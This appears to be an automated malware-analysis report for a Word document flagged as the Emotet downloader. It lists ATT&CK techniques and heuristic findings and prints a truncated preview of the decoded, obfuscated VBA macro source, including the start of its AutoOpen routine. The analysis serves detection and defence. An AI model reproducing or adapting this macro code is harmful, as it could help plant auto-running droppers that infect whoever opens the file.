MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6915911-0', indicating a downloader functionality. High-severity heuristics confirm the presence of VBA macros, specifically an 'AutoOpen' macro that utilizes 'GetObject', suggesting an attempt to execute code. The macro's obfuscated nature and the 'GetObject' call strongly imply it's designed to download and execute a second-stage payload, a common Emotet tactic.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6915911-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6915911-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27836 bytes |
SHA-256: c4679016e3e0558534d4e107e90d43039dab874c4b3627f3585416ccd6084499 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "SUA1oUA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jAoAAAUU"
Attribute VB_Base = "0{A47B6741-B00D-4B55-8CA1-C260083119C4}{F6F9139C-DB7C-42FB-82EB-2A07D20EA084}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "wwDAAAU1"
Attribute VB_Base = "0{4EE7E74E-959E-4AE3-A66F-EEA932E7F759}{2428C857-52B5-4749-B34B-8DAA1EA7DB92}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "CAA4DAU"
Function UA_QZ_()
If vAUkAB = GAADwC Then
nDX4_A_ = (688104598 - WcxAC_A * zB44AU * CDate(995134992))
uXADoQ = PB4BcUU / Oct(rXZo_1A) - oAZ1o_A * CDbl(318628824) / PDDAAQ * Fix(170622870 * Log(RxBAAZoA)) / WoQB_c * Chr(151237250) * 900149291 * Sgn(GXGA_BAA / Log(927030347))
End If
If sAwAU1 = MAcAACAA Then
RDAxX1D = (1453336 - ScAAQQU * E4XcxBGU * CDate(591982750))
ZxGAAwZB = OU__AAQA / Oct(cGB4AAk) - aAQkAx * CDbl(354232328) / vA1QkBAX * Fix(705437125 * Log(iAADUkAA)) / iDAUAxZ * Chr(290458042) * 334185540 * Sgn(wAUAwcQc / Log(791639010))
End If
If SQ1AcA = tQckwQB Then
KAZCxUG = (751389175 - SDAwAwA * tcDDZ4 * CDate(83847869))
ZAACZZ_ = JADA1B / Oct(MABAAA) - X4kXcACU * CDbl(151320231) / AAoQQc * Fix(20422756 * Log(nAUZ4ADA)) / iAAwxA * Chr(340485134) * 563333166 * Sgn(UG_AQ_AD / Log(273539875))
End If
If CAUUkAAA = pDoAQGA Then
JBUAQBA = (749663611 - zx_DkQ * roU_AB1 * CDate(689963994))
nAAQAB = ixAoXB / Oct(CUAcQkQD) - kUAQxD * CDbl(913354321) / jAAA4XAk * Fix(976837005 * Log(ikACAADC)) / twAXAAx * Chr(147071862) * 999483376 * Sgn(X4AAoAUQ / Log(695920525))
End If
If lADDwwU = J4BAxw Then
UABAAQDB = (756000771 - uUxAA_ * OUUkQBw * CDate(527911137))
NA14GAUD = PcA_11A / Oct(zAUCAC) - fxBAccoZ * CDbl(868364882) / mcAAwA * Fix(291895848 * Log(wBwAZUA)) / GGADAAA * Chr(648967435) * 400633718 * Sgn(ScAZAC / Log(158327118))
End If
If RCUXAQo = zkXQAU Then
XAAAABCB = (7526644 - JxQ1AAUX * GA_UAAQo * CDate(168814414))
rAADxAU = fUAoUcAB / Oct(VQoAA14U) - JUB4QA * CDbl(595955921) / BXcDGDUx * Fix(563465634 * Log(jCAA_AcU)) / WAwABo * Chr(879810525) * 441073972 * Sgn(UAAkAA_ / Log(207143835))
End If
If RXwABU = JCX1DDA Then
VDAADUA = (57293670 - VoDBUBQ * NG_GZUQ * CDate(536414623))
p4xACok = z_1BXAk / Oct(T_U1QQ) - wGGA4XAA * CDbl(576953630) / CAG41U4 * Fix(34694068 * Log(NCDQGA)) / ZAZUcCA4 * Chr(45963371) * 389931454 * Sgn(HAGABCUo / Log(434572776))
End If
If lQ4CQ_CA = SXBCAQBA Then
YADBA_ = (244857421 - rA1C_Q * lw_Aw14k * CDate(283022064))
cxoCXUZ1 = J1w4C4oA / Oct(UDQBGA) - HAU_QA * CDbl(778889406) / skACAAwQ * Fix(933047311 * Log(NUADA4U)) / AAAQAAA * Chr(18622373) * 718764506 * Sgn(qA4xAcAk / Log(22002999))
End If
If JA11QBDA = l_QAB1DQ Then
Bk1_XDX = (366737905 - b1wB4B * hxQAA_Q * CDate(178858598))
VABQUA = mBkUGU / Oct(MAwUw1k) - EUoUBCcD * CDbl(923506032) / ZcBABQA * Fix(354352169 * Log(SD_AwD)) / Dk4kG4 * Chr(594403804) * 102652740 * Sgn(ukAAQ1AA / Log(841183881))
End If
End Function
Sub autoopen()
On Error Resume Next
If Vx1ABB = vAADAA Then
zAGCAZ = (508186873 - uABZUADZ * TZQAAAA * CDate(740808591))
FZXAAoUX = wZUAGA / Oct(LAABAxA4) - NADADUU * CDbl(392799179) / dAXXUU * Fix(472562357 * Log(l4UZAZ1A)) / J4AZAACA * Chr(192308210) * 420688127 * Sgn(OAxAAC / Log(259002929))
End If
If TA_UAAU = D1DUUk Then
DA_AU1_ = (528634885 - sAXXAA * OAA4xB * CDate(868662169))
V
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.